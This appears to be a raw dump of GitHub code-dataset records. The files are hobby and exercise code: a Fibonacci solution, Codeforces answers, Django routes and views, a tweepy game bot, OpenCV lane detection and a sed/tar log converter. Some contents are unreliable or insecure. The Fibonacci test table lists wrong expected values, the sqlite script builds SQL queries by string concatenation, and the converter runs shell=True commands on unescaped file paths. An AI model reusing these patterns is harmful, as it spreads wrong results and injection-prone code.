fib(self, n: int) -> int:\n return fib(n)\n\n\ndef fib(n: int) -> int:\n if n == 0:\n return 0\n elif n == 1:\n return 1\n\n cache1 = 0\n cache2 = 1\n for _ in range(2, n):\n tmp = cache1 + cache2\n cache1 = cache2\n cache2 = tmp\n\n return cache1 + cache2\n\n\ndata = [\n (0, 0),\n (1, 1),\n (2, 1),\n (3, 2),\n (4, 3),\n (10, 55),\n (20, 6755),\n (30, 6755),\n (35, 9227465),\n (40, 102334155),\n (50, 12586269025),\n]\n\nfor input, output in data:\n print(Solution().fib(input), output)\n","repo_name":"karmabadger/leetcode-solutions","sub_path":"src/problems/509/s2.py","file_name":"s2.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"72498715303","text":"rivers = {\n 'nile': 'egypt',\n 'neva': 'SPB',\n 'dnepr': 'kiev'\n}\n# for river, place in rivers.items():\n# print(f\"River {river} runs through {place.title()}.\")\n\n# for river in rivers.keys():\n# print(river)\n\nfor place in rivers.values():\n print(place)","repo_name":"astreltsov/firstproject","sub_path":"Eric_Matthes_BOOK/DICTIONARY/rivers.py","file_name":"rivers.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"21820955323","text":"def check(a,b,c):\r\n if x==max(a,b) and y==max(a,c) and z==max(b,c):\r\n print(\"YES\")\r\n print(a,b,c)\r\n return True\r\n return False\r\nfor _ in range(int(input())):\r\n x,y,z=map(int,input().split())\r\n # a\r\n a = 1\r\n b = x\r\n c = y\r\n flag = 0\r\n if check(a,b,c):\r\n flag = 1\r\n continue\r\n # b\r\n a = x\r\n b = 1\r\n c = z\r\n if check(a,b,c):\r\n flag = 1\r\n continue\r\n # c\r\n a = y\r\n b = z\r\n c = 1\r\n if check(a,b,c):\r\n flag = 1\r\n continue\r\n if not flag:\r\n print(\"NO\")","repo_name":"sainad2222/my_cp_codes","sub_path":"codeforces/1385/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"30673207315","text":"\"\"\"Library URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom firstapp import views\n# from Users import views\nfrom Users import views as user_views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('welcome/', views.home, name='home_page'),\n path('books/', views.show_books, name='all_active_books'),\n path('update1//', views.update_book, name='update_book'),\n path('delete1//', views.delete_book, name='delete_book'),\n path('soft-delete//', views.soft_delete_book, name='soft_delete_book'),\n path('inactive-books/', views.show_inactive_books, name='all_inactive_books'),\n path('restore-books//', views.restore_books, name='restore_books'),\n\n\n # path('book-form/', views.book_form, name='book_form'),\n # path('sibtc-form/', views.sibtc, name='sibtc'),\n\n # split view\n # path('views_a/', views.view_a, name='view_a),\n # path('views_b/', views.view_b, name='view_b),\n # path('sibtc-form/', views.sibtc, name='sib),\n # path('sibtc-form/', views.sibtc, name='sib),\n\n path(\"index/\", views.index, name=\"index\"),\n\n # User url\n path(\"register/\", user_views.register_request, name=\"register\"),\n path(\"login/\", user_views.login_request, name=\"login_user\"),\n path(\"logout/\", user_views.logout_request, name=\"logout_user\"),\n \n path(\"create-csv/\", views.create_csv, name=\"create_csv\"),\n path(\"create-excel-active-books/\", views.create_excel_active_books, name=\"create_excel_active_books\"),\n path(\"create-excel-inactive-books/\", views.create_excel_inactive_books, name=\"create_excel_inactive_books\"),\n path(\"upload-csv/\", views.upload_csv, name=\"upload_csv\"),\n path(\"read-text/\", views.read_text, name=\"read_text\"),\n path(\"download-csv/\", views.download_csv, name=\"download_csv\"),\n path(\"book-duplicate/\", views.book_duplicate, name=\"book_duplicate\"),\n path(\"book-/\", views.book_duplicate, name=\"book_duplicate\"),\n path(\"create-csv-raw/\", views.create_csv_raw, name=\"create_csv_raw\"),\n\n # class based view\n # path(\"cbv/\", views.NewView.as_view(), name='cbv'),\n path(\"cbv-create-book/\", views.BookCreate.as_view(), name='BookCreate'),\n path(\"retrive/\", views.BookRetrive.as_view(), name='BookRetrive'),\n path(\"retrive//\", views.BookDetail.as_view(), name='BookDetail'),\n path(\"update//\", views.BookUpdate.as_view(), name='BookUpdate'),\n path(\"delete//\", views.BookDelete.as_view(), name='BookDelete'),\n\n path(\"login-cbv/\", user_views.LoginPageView.as_view(), name='LoginPageView'),\n path(\"logout-cbv/\", user_views.LogoutView.as_view(), name='LogoutView'),\n\n # another application users are fetching in another application\n path(\"get-studs/\", views.get_all_stud, name=\"test\"),\n\n\n\n]\n","repo_name":"saroja23/b8_test","sub_path":"Library/Library/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"899044535","text":"import sqlite3\r\nimport os\r\nimport bamnostic as bn\r\n\r\n#get connection to the sqlite database\r\nconn = sqlite3.connect(\"E:\\speedSplice\" + os.path.sep + 'splice.sqlite', isolation_level=None)\r\nc = conn.cursor()\r\n\r\n\r\nsamfile = bn.AlignmentFile(\"hg19test.bam\", \"rb\")\r\n\r\ni = 0\r\nfor read in samfile:\r\n cigar = read.cigarstring\r\n start = read.reference_start+read.cigar[0][1]\r\n stop = read.reference_start+read.cigar[0][1]+read.cigar[1][1]\r\n if \"N\" in cigar:\r\n i+=1\r\n c.execute(\"SELECT * FROM splice WHERE from_pos='\"+start+\"' AND to_pos='\"+stop+\"'\")\r\n print (cigar, read.cigartuples, start, stop, read.reference_name)\r\n if i > 50:\r\n break\r\n\r\n\r\n","repo_name":"InSilicoSolutions/Splicer","sub_path":"Splicer/bamReader.py","file_name":"bamReader.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"43508313732","text":"\"\"\"\r\ntest imports version\r\n\"\"\"\r\n\r\nfrom importlib import import_module\r\nimport sys\r\n\r\ndef load_dependencies(file):\r\n reader = open(file,'r')\r\n dependencies = reader.readlines()\r\n reader.close()\r\n dependencies = [x.strip() for x in dependencies] # remove spaces\r\n count = len(dependencies)\r\n success = 0\r\n for module in dependencies:\r\n try:\r\n globals()[module] = import_module(module)\r\n success +=1\r\n except:\r\n print(f'failed to import line {module}')\r\n return count, success\r\n\r\n\r\ndef version_print(count,success):\r\n modulenames = set(sys.modules) & set(globals())\r\n allmodules = [sys.modules[name] for name in modulenames]\r\n versioned = 0\r\n\r\n print(\"\\nImported Version\")\r\n for module in allmodules:\r\n try:\r\n print(module.__name__, module.__version__)\r\n versioned+=1\r\n except:\r\n try:\r\n print(module.__name__, module.version)\r\n versioned+=1\r\n except:\r\n print(module.__name__, \"does not have version info\" )\r\n\r\n print('\\n\\n',versioned, \"of\", len(allmodules), \\\r\n \"imported libraries provide '__version__' or 'version'\",\\\r\n f'\\n& {success} out of {count} lines imported from requirements')\r\n\r\nif __name__=='__main__':\r\n lines,imported = load_dependencies('requirements.txt')\r\n version_print(lines,imported)\r\n","repo_name":"chriswilly/kuramoto-osc","sub_path":"Python/kurosc/test_imports_version.py","file_name":"test_imports_version.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"32482087221","text":"import tweepy\nimport logging\nimport time\nimport Activities\nimport RWData\nimport random\n\nlogging.basicConfig(level=logging.INFO)\n\nCRYSTAL = 2\nSTAMINA = 3\nBAIT = 4\nEQUIPB = 5\nEQUIPC = 6\nGOLD = 7\n\ndef check_mentions(api, keywords, since_id, sheet_data):\n latest_id = since_id\n user_names = sheet_data['user_names'][0]\n for tweet in tweepy.Cursor(api.mentions_timeline,\n since_id=since_id).items():\n if (int(latest_id) <= tweet.id):\n latest_id = tweet.id\n task_name = \"\"\n\n if tweet.in_reply_to_status_id is not None:\n continue\n\n for keyword in keywords:\n if keyword in tweet.text.lower():\n task_name = keyword\n if task_name != \"\":\n print(f\"Answering to {tweet.user.name}\")\n print(tweet.id)\n # save replied tweet's id\n\n if task_name == \"오늘의운세\":\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + Activities.todays_fortune(),\n in_reply_to_status_id=tweet.id,\n )\n\n elif task_name == \"[낚시]\":\n print(\"낚시 시작\")\n has_enough_bait = Activities.check_user_status(user_names, tweet.user.name, BAIT, 1)\n if has_enough_bait is True:\n fish_result = Activities.activity_result(sheet_data, \"fish_data\")\n if fish_result[0] != \"\":\n api.update_with_media(fish_result[0],\n status=\"@%s\" % tweet.user.screen_name + fish_result[1],\n in_reply_to_status_id=tweet.id,\n )\n else:\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + fish_result[1],\n in_reply_to_status_id=tweet.id,\n )\n else:\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name\n + \"떡밥이 없거나 없는 유저명입니다. 상점에서 떡밥을 구입하거나 이름을 확인해주세요.\",\n in_reply_to_status_id=tweet.id,\n )\n time.sleep(2)\n elif task_name == \"[사냥]\":\n print(\"사냥 시작\")\n has_enough_stamina = Activities.check_user_status(user_names, tweet.user.name, STAMINA, 20)\n if has_enough_stamina is True:\n hunt_result = Activities.activity_result(sheet_data, \"hunt_data\")\n if hunt_result[0] != \"\":\n api.update_with_media(hunt_result[0],\n status=\"@%s\" % tweet.user.screen_name + hunt_result[1],\n in_reply_to_status_id=tweet.id,\n )\n else:\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + hunt_result[1],\n in_reply_to_status_id=tweet.id,\n )\n else:\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name\n + \"스테미나가 부족하거나 없는 유저명입니다. 상점에서 회복약을 구입하거나 스테미나가 회복될 때까지 기다려주세요.\",\n in_reply_to_status_id=tweet.id,\n )\n time.sleep(2)\n elif task_name == \"[요리]\":\n print(\"요리 시작\")\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + Activities.cooking(sheet_data),\n in_reply_to_status_id=tweet.id,\n )\n\n elif task_name == \"[장비뽑기]\":\n print(\"장비 뽑기 시작\")\n has_enough_crystal = Activities.check_user_status(user_names, tweet.user.name, CRYSTAL, 3000)\n if has_enough_crystal is True:\n\n # check the number of each rate of equipment and upload the image\n equip_list = Activities.generate_eqip_list(sheet_data, tweet.user.name)\n api.update_with_media(equip_list[4], \"@%s\" % tweet.user.screen_name,\n in_reply_to_status_id=tweet.id,\n )\n time.sleep(5)\n # print B,C equipment\n comment = Activities.print_gotcha_result(sheet_data, \"equip_data\", equip_list, 3) + Activities.print_gotcha_result(\n sheet_data, \"equip_data\", equip_list, 2)\n for i in range(0, len(comment) // 139 + 1):\n if comment[i*139:(i + 1) * 139] != '\\n':\n api.update_status(status=\"@%s \" % tweet.user.screen_name + comment[i * 139: (i + 1) * 139],\n in_reply_to_status_id=tweet.id,\n )\n # print A,S equipment\n S_equip = Activities.print_S_equip(sheet_data, \"equip_data\", equip_list)\n comment = Activities.print_gotcha_result(sheet_data, \"equip_data\", equip_list, 1) + S_equip[1]\n if len(S_equip[0]) != 0:\n media_ids = []\n for filename in S_equip[0]:\n print(S_equip[0])\n res = api.media_upload(filename)\n media_ids.append(res.media_id)\n api.update_status(media_ids=media_ids, status=\"@%s\" % tweet.user.screen_name + comment[:139],\n in_reply_to_status_id=tweet.id,\n )\n if len(comment) > 139:\n for i in range(1, len(comment) // 139 + 1):\n if comment[i*139:(i + 1) * 139] != '\\n':\n api.update_status(\n status=\"@%s \" % tweet.user.screen_name + comment[i * 139: (i + 1) * 139],\n in_reply_to_status_id=tweet.id,\n )\n else:\n if comment != \"\":\n for i in range(0, len(comment) // 139 + 1):\n if comment[i*139:(i + 1) * 139] != '\\n':\n api.update_status(\n status=\"@%s \" % tweet.user.screen_name + comment[i * 139: (i + 1) * 139],\n in_reply_to_status_id=tweet.id,\n )\n Activities.update_user_inven(user_names, tweet.user.name, equip_list)\n else:\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + \"없는 유저이거나 크리스탈이 부족합니다. 가챠숍에서 크리스탈을 구매해주세요.\",\n in_reply_to_status_id=tweet.id,\n )\n time.sleep(2)\n\n elif task_name == \"[하급장비판매]\":\n print(\"c등급 판매 시작\")\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + Activities.sell_equips(user_names, tweet.user.name, False, True),\n in_reply_to_status_id=tweet.id,\n )\n time.sleep(2)\n elif task_name == \"[중급장비판매]\":\n print(\"b등급 판매 시작\")\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + Activities.sell_equips(user_names, tweet.user.name, True, False),\n in_reply_to_status_id=tweet.id,\n )\n time.sleep(2)\n elif task_name == \"[일괄판매]\":\n print(\"일괄 판매 시작\")\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + Activities.sell_equips(user_names, tweet.user.name, True, True),\n in_reply_to_status_id=tweet.id,\n )\n time.sleep(2)\n elif task_name == \"[tmi보기]\":\n print(\"tmi 출력 시작\")\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + Activities.random_feature(sheet_data, tweet.user.name),\n in_reply_to_status_id=tweet.id,\n )\n\n else:\n api.update_status(\n status=\"@%s 오류입니다. 해당 트윗과 봇에 보낸 트윗을 캡쳐해서 총괄계 디엠으로 보내주세요.\" % tweet.user.screen_name,\n in_reply_to_status_id=tweet.id,\n )\n\n RWData.update_file(\"replied_mention_ids.txt\", latest_id)\n return latest_id","repo_name":"jayin301/tweetbot_trpg","sub_path":"UpdateTweet.py","file_name":"UpdateTweet.py","file_ext":"py","file_size_in_byte":9225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"35864183779","text":"# Import dependencies\nimport numpy as np\nimport cv2\nimport pickle\n\n# Constants\n# Yellow and white color filter\nDARK_YELLOW = np.array([18, 94, 140])\nBRIGHT_YELLOW = np.array([48, 255, 255])\nDARK_WHITE = np.array([0, 0, 200])\nBRIGHT_WHITE = np.array([255, 255, 255])\n\n# Dilation and erosion, Gaussian blur kernel\nDILATE_ERODE_KERNEL = np.ones((5, 5))\nGAUSSIAN_BLUR_KERNEL = (5, 5)\n\n# Sliding window filter\nMIN_NUMBER_OF_PIXELS_PER_WINDOW = 1\nLEFT_LANE_COLOR = [255, 0, 100]\nRIGHT_LANE_COLOR = [0, 100, 255]\n\n# Image warp parameters\nWARP_POINTS = np.float32([(42 / 100, 63 / 100), (1 - (42 / 100), 63 / 100), (14 / 100, 87 / 100), (1 - (14 / 100), 87 / 100)])\nORIG_POINTS = np.float32([(0, 0), (1, 0), (0, 1), (1, 1)])\n\n\n# Undistort with calibration pickle file function\ndef undistort_with_cal_pickle_file(img, cal_dir):\n # Open pickle file\n with open(cal_dir, mode='rb') as f:\n file = pickle.load(f)\n # Load distortion parameters\n mtx = file['mtx']\n dist = file['dist']\n # Perform un-distortion\n dst = cv2.undistort(img, mtx, dist, None, mtx)\n # Return un-distorted image\n return dst\n\n\n# Color filter function\ndef apply_yellow_white_filter(img):\n # Convert image to HSV\n img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n # Keep white and yellow image parts\n img_masked_white, img_masked_yellow = cv2.inRange(img_hsv, DARK_WHITE, BRIGHT_WHITE), cv2.inRange(img_hsv, DARK_YELLOW, BRIGHT_YELLOW)\n # Unite images\n img_masked = cv2.bitwise_or(img_masked_white, img_masked_yellow)\n # Return image after union\n return img_masked\n\n\n# Run Canny edge detector in a color masked image function\ndef run_masked_canny_detector(img):\n # Convert image to grayscale\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # Apply Gaussian blur filter and Canny edge detection\n img_blurred = cv2.GaussianBlur(img_gray, GAUSSIAN_BLUR_KERNEL, 0)\n img_canny = cv2.Canny(img_blurred, 50, 100)\n # Perform dialation and erosion\n img_dila = cv2.dilate(img_canny, DILATE_ERODE_KERNEL, iterations=1)\n img_eros = cv2.erode(img_dila, DILATE_ERODE_KERNEL, iterations=1)\n # Apply yellow and white color filter\n img_masked = apply_yellow_white_filter(img)\n # Unite edge detection and color filter results\n img_masked_canny = cv2.bitwise_or(img_masked, img_eros)\n # Return united image, Canny detection results and color masked image\n return img_masked_canny, img_canny, img_masked\n\n\n# Perform image warp function \ndef perform_image_warp(img, dst_size, src, dst):\n # Get image size as float\n img_size = np.float32([(img.shape[1],img.shape[0])])\n # Multiply define source and destination points during image warp\n src = src * img_size\n dst = dst * np.float32(dst_size)\n # Determine perspective transformation matrix\n M_trans = cv2.getPerspectiveTransform(src, dst)\n # Perform perspective transformation\n img_warped = cv2.warpPerspective(img, M_trans, dst_size)\n # Return warped image\n return img_warped\n\n\n# Get image histogram function\ndef get_image_histogram(img):\n hist = np.sum(img[img.shape[0] // 2:, :], axis=0)\n return hist\n\n\n# Apply sliding window filter function\ndef apply_sliding_window_filter(img, n_windows=12, margin=144, draw_windows=True):\n # Prepare output image\n img_out = np.dstack((img, img, img)) * 255\n\n # Get image histogram - 0 if black and positive if bright color, e. g. yellow or white\n histogram = get_image_histogram(img)\n \n # find peaks of left and right halves\n histogram_midpoint = int(histogram.shape[0] / 2)\n # Find brightness maximum in left half of the histogram\n window_x_left = np.argmax(histogram[:histogram_midpoint])\n # Find brightness maximum in right half of the histogram\n window_x_right = np.argmax(histogram[histogram_midpoint:]) + histogram_midpoint\n # Current positions to be updated for each window\n window_x_left_current, window_x_right_current = window_x_left, window_x_right\n\n # Set height of windows depending on number of windows along image height\n window_height = np.int(img.shape[0] / n_windows)\n # Identify the x and y positions of all non-zero pixels in the image\n inds_nonzero = img.nonzero()\n inds_y_nonzero, inds_x_nonzero = np.array(inds_nonzero[0]), np.array(inds_nonzero[1])\n \n # Create empty lists to receive left and right lane pixel indices\n inds_left_lane, inds_right_lane = [], []\n # Step through the windows one by one\n for window in range(n_windows):\n # Identify window boundaries in x and y (and right and left) - according to window height and width (margin)\n win_y_low = img.shape[0] - (window + 1) * window_height\n win_y_high = img.shape[0] - window * window_height\n win_xleft_low = window_x_left_current - margin\n win_xleft_high = window_x_left_current + margin\n win_xright_low = window_x_right_current - margin\n win_xright_high = window_x_right_current + margin\n # Draw the windows on the visualization image\n if draw_windows == True:\n cv2.rectangle(img_out, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high),\n (100, 255, 255), 1)\n cv2.rectangle(img_out, (win_xright_low, win_y_low), (win_xright_high, win_y_high),\n (100, 255, 255), 1)\n # Identify the nonzero pixels in x and y within the window\n inds_left_nonzero = ((inds_y_nonzero >= win_y_low) & (inds_y_nonzero < win_y_high) &\n (inds_x_nonzero >= win_xleft_low) & (inds_x_nonzero < win_xleft_high)).nonzero()[0]\n inds_right_nonzero = ((inds_y_nonzero >= win_y_low) & (inds_y_nonzero < win_y_high) &\n (inds_x_nonzero >= win_xright_low) & (inds_x_nonzero < win_xright_high)).nonzero()[0]\n # Re-center next window along mean of pixel indizes within current window\n if len(inds_left_nonzero) > MIN_NUMBER_OF_PIXELS_PER_WINDOW:\n window_x_left_current = np.int(np.mean(inds_x_nonzero[inds_left_nonzero]))\n if len(inds_right_nonzero) > MIN_NUMBER_OF_PIXELS_PER_WINDOW:\n window_x_right_current = np.int(np.mean(inds_x_nonzero[inds_right_nonzero]))\n # Append left and right lane points to the list\n inds_left_lane.append(inds_left_nonzero)\n inds_right_lane.append(inds_right_nonzero)\n \n # Concatenate the arrays of indices\n inds_left_lane = np.array([lane_data for lane_data in inds_left_lane if lane_data.any()])\n inds_right_lane = np.array([lane_data for lane_data in inds_right_lane if lane_data.any()])\n if inds_left_lane.shape[0] == 0 or inds_right_lane.shape[0] == 0:\n return img, None, None\n inds_left_lane, inds_right_lane = np.concatenate(inds_left_lane), np.concatenate(inds_right_lane)\n\n # Get left and right line pixel positions as arrays of points\n points_x_left, points_y_left = inds_x_nonzero[inds_left_lane], inds_y_nonzero[inds_left_lane]\n points_x_right, points_y_right = inds_x_nonzero[inds_right_lane], inds_y_nonzero[inds_right_lane]\n\n # If both left and right x coordinate point arrays hold points, perform polynomial fit\n if points_x_left.size and points_x_right.size:\n # Fit a second order polynomial to left and right lane point sets\n left_fit = np.polyfit(points_y_left, points_x_left, 2)\n right_fit = np.polyfit(points_y_right, points_x_right, 2)\n\n # Get polynomial parameters for left and right lane\n left_a, left_b, left_c, right_a, right_b, right_c = [], [], [], [], [], []\n left_a.append(left_fit[0])\n left_b.append(left_fit[1])\n left_c.append(left_fit[2])\n right_a.append(right_fit[0])\n right_b.append(right_fit[1])\n right_c.append(right_fit[2])\n \n # Use average parameters for actual left and right lane fit\n left_fit, right_fit = np.empty(3), np.empty(3)\n left_fit[0], left_fit[1], left_fit[2] = np.mean(left_a[-10:]), np.mean(left_b[-10:]), np.mean(left_c[-10:])\n right_fit[0], right_fit[1], right_fit[2] = np.mean(right_a[-10:]), np.mean(right_b[-10:]), np.mean(right_c[-10:])\n\n # Generate x and y values from image shape to plot points along polynomial fit\n point_range = np.linspace(0, img.shape[0] - 1, img.shape[0])\n left_fit_x = left_fit[0] * point_range ** 2 + left_fit[1] * point_range + left_fit[2]\n right_fit_x = right_fit[0] * point_range ** 2 + right_fit[1] * point_range + right_fit[2]\n\n # Colorize polynomial lane fit results in output image\n img_out[inds_y_nonzero[inds_left_lane], inds_x_nonzero[inds_left_lane]] = LEFT_LANE_COLOR\n img_out[inds_y_nonzero[inds_right_lane], inds_x_nonzero[inds_right_lane]] = RIGHT_LANE_COLOR\n\n # Return output image and both lane fit points in x and y as well as range of points along fit\n return img_out, (left_fit_x, right_fit_x), point_range\n # If no lanes where found, return original image\n else:\n # Return original image\n return img, None, None\n\n\n# Draw lanes function\ndef draw_lanes(img, left_fit, right_fit, frame_width, frame_height, src):\n # Define point range along image shape\n point_range = np.linspace(0, img.shape[0] - 1, img.shape[0])\n # Prepare output image\n img_color = np.zeros_like(img)\n # Process points for poly fill\n left_points = np.array([np.transpose(np.vstack([left_fit, point_range]))])\n right_points = np.array([np.flipud(np.transpose(np.vstack([right_fit, point_range])))])\n points = np.hstack((left_points, right_points))\n # Draw lanes as polygons\n cv2.fillPoly(img_color, np.int_(points), (100 , 255, 0))\n # Re-warp image\n img_color = perform_image_warp(img_color, dst_size=(frame_width, frame_height), src=ORIG_POINTS, dst=WARP_POINTS)\n # Add original image and colorized lanes\n img_color = cv2.addWeighted(img, 0.5, img_color, 0.7, 0)\n # Return image with colorized lanes\n return img_color","repo_name":"codeXing8/LaneRecognition","sub_path":"warped-window-polyfit2D/warped_window_polyfit2D_lib.py","file_name":"warped_window_polyfit2D_lib.py","file_ext":"py","file_size_in_byte":9962,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"73819291945","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport subprocess\nimport tempfile\n\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom logger import log\n\n\nclass ConvertParams:\n def __init__(self):\n self.log_path = None # type: str\n self.script_path = None # type: str\n self.file = None # type: str\n\n\nclass Column:\n \"\"\"\n Csv column definitions.\n \"\"\"\n ADDR = 'addr' # type: str\n CMD = 'cmd' # type: str\n FLAGS = 'flags' # type: str\n\n\nclass Flag:\n \"\"\"\n Csv flag definitions.\n \"\"\"\n #: Uses regular expression to ADDR.\n REGEX = \"regex\" # type: str\n\n\nclass Converter:\n DIR_SUFFIX = \".conv\" # type: str\n SED_ADD_FMT = \"/%s/ s/$/%s/\\n\" # type: str\n SED_CMD_FMT = \"sed -r -f %s \\\"%s\\\" > \\\"%s\\\"\" # type: str\n ESCAPE_CAR = ['\\\\', '/', '*', '.', '+', '?', '|', '{', '}', '(', ')', '[', ']', '^', '$'] # type: list of str\n SED_REPLACES = list(zip(ESCAPE_CAR, ['\\\\' + x for x in ESCAPE_CAR])) # type: list of touple\n\n def __init__(self, params: ConvertParams):\n self.__p = params\n self.__tar_dir = None # type: str\n\n def exec(self):\n \"\"\"\n Execute conversion.\n :return (Result, Output directory if exists.)\n :rtype (bool, str)\n \"\"\"\n if not self.__is_files_exists():\n return False, None\n\n sc = self.__csv_to_sed_script()\n\n out_dir = None\n if self.__p.file is None:\n self.__un_tar()\n out_dir = self.__exec_convert_tar(sc)\n else:\n self.__exec_convert(sc)\n os.unlink(sc) # remote temp file\n\n return True, out_dir\n\n def __is_files_exists(self):\n \"\"\"\n Checks required files exists.\n :return: True: All file exists. False: Not exists.\n :rtype bool\n \"\"\"\n if (not self.__p.log_path is None) and (not os.path.exists(self.__p.log_path)):\n log.w(\"- not found: %s\" % self.__p.log_path)\n return False\n if (not self.__p.file is None) and (not os.path.exists(self.__p.file)):\n log.w(\"- not found: %s\" % self.__p.file)\n return False\n if not os.path.exists(self.__p.script_path):\n log.w(\"- not found: %s\" % self.__p.script_path)\n return False\n\n return True\n\n def __exec_convert(self, script_path):\n \"\"\"\n Execute conversion using `sed` command.\n :param str script_path: Script file path, which is used by `sed` command.\n \"\"\"\n # execute conversion\n f = os.path.splitext(self.__p.file)\n dp = f[0] + Converter.DIR_SUFFIX + f[1]\n log.i(\"- convert: %s\" % dp)\n self.__call(Converter.SED_CMD_FMT % (script_path, self.__p.file, dp))\n\n def __exec_convert_tar(self, script_path):\n \"\"\"\n Execute conversion a tar file.\n :param str script_path: Script file path, which will be used by `sed` command.\n :return Output directory\n :rtype str\n \"\"\"\n out_dir = self.__tar_dir + Converter.DIR_SUFFIX\n for d, f in tqdm(list(self.__files())):\n # create output directory.\n dist = os.path.join(out_dir, d)\n if not os.path.exists(dist):\n os.makedirs(dist)\n\n # execute conversion\n sp = os.path.join(self.__tar_dir, d, f)\n dp = os.path.join(dist, f)\n log.d(\"- convert: %s\" % dp)\n self.__call(Converter.SED_CMD_FMT % (script_path, sp, dp))\n\n return out_dir\n\n def __un_tar(self):\n \"\"\"\n Extract a __p.log_path tar file.\n \"\"\"\n self.__tar_dir = os.path.splitext(self.__p.log_path)[0]\n if not os.path.exists(self.__tar_dir):\n os.makedirs(self.__tar_dir)\n self.__call(\"tar xf %s -C %s\" % (self.__p.log_path, self.__tar_dir))\n\n def __call(self, cmd):\n \"\"\"\n Execute a command.\n :param str cmd: Command string.\n :return: Return code of the command.\n :rtype int\n \"\"\"\n log.d(\" > %s\" % cmd)\n return subprocess.call(cmd, shell=True)\n\n def __files(self):\n \"\"\"\n Find files.\n :return: Iterator[str]\n \"\"\"\n for root, dirs, files in os.walk(self.__tar_dir):\n d = root[len(self.__tar_dir) + 1:]\n for file in files:\n yield (d, file)\n\n def __csv_to_sed_script(self):\n \"\"\"\n Generate sed script from csv file.\n :return: File path name.\n :rtype str\n \"\"\"\n df = pd.read_csv(self.__p.script_path,\n names=[Column.ADDR, Column.CMD, Column.FLAGS]) # type: pandas.core.frame.DataFrame\n if df.flags.count() > 0:\n df.addr = df.apply(self.__convert_addr, axis=1)\n else:\n df.addr = df.addr.apply(self.__escape_sed_addr)\n\n with tempfile.NamedTemporaryFile(mode='w+t', delete=False) as tf:\n for i, r in df.iterrows():\n tf.write(Converter.SED_ADD_FMT % (r.addr, r.cmd))\n return tf.name\n\n # remain script file for debug.\n # f = \"tests/test.sed\"\n # with open(f, \"w\") as fd:\n # for i, r in df.iterrows():\n # fd.write(Converter.SED_ADD_FMT % (addr[i], r[1]))\n # return f\n\n def __convert_addr(self, row):\n \"\"\"\n Convert addr according to flags.\n :param pandas.Series row:\n :return: Converted addr.\n :rtype str\n \"\"\"\n if type(row[Column.FLAGS]) == str and Flag.REGEX in row[Column.FLAGS]:\n return row.addr\n else:\n return self.__escape_sed_addr(row.addr)\n\n def __escape_sed_addr(self, address):\n \"\"\"\n Escape sed address string.\n :param str address: Address string which is escaped.\n :return: Escaped string.\n :rtype str\n \"\"\"\n for c, r in Converter.SED_REPLACES:\n address = address.replace(c, r)\n return address\n","repo_name":"ujiro99/auto_logger","sub_path":"logger/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"32312590227","text":"from django.forms import forms\r\nfrom django.http import request\r\nfrom django.views.generic import TemplateView\r\nfrom .scrape import getPrices\r\nfrom django.shortcuts import render\r\nfrom .form import ProductView\r\n\r\n\r\n\r\ndef home_view(request, *args, **kwargs):\r\n print(args, kwargs)\r\n print(request.user)\r\n forms= ProductView()\r\n return render(request, \"index.html\", {\r\n 'form' : forms\r\n })\r\n\r\n#def product_view(request, *args, **kwargs):\r\n # my_context ={\r\n # getPrices()\r\n # }\r\n # return getPrices(request,\"index.html\", my_context)\r\n\r\ndef show_result(request):\r\n if request.method=='POST':\r\n forms= ProductView(request.POST)\r\n if forms.is_valid():\r\n results = getPrices()\r\n \r\n return render(request, 'result.html', {\r\n 'results' : results\r\n })\r\n else:\r\n forms= ProductView()\r\n return render(request, 'index.html',{\r\n 'form': forms\r\n })\r\n\r\n \r\n\r\n\r\n","repo_name":"Humaira1227/cse470-file","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"41034396057","text":"import 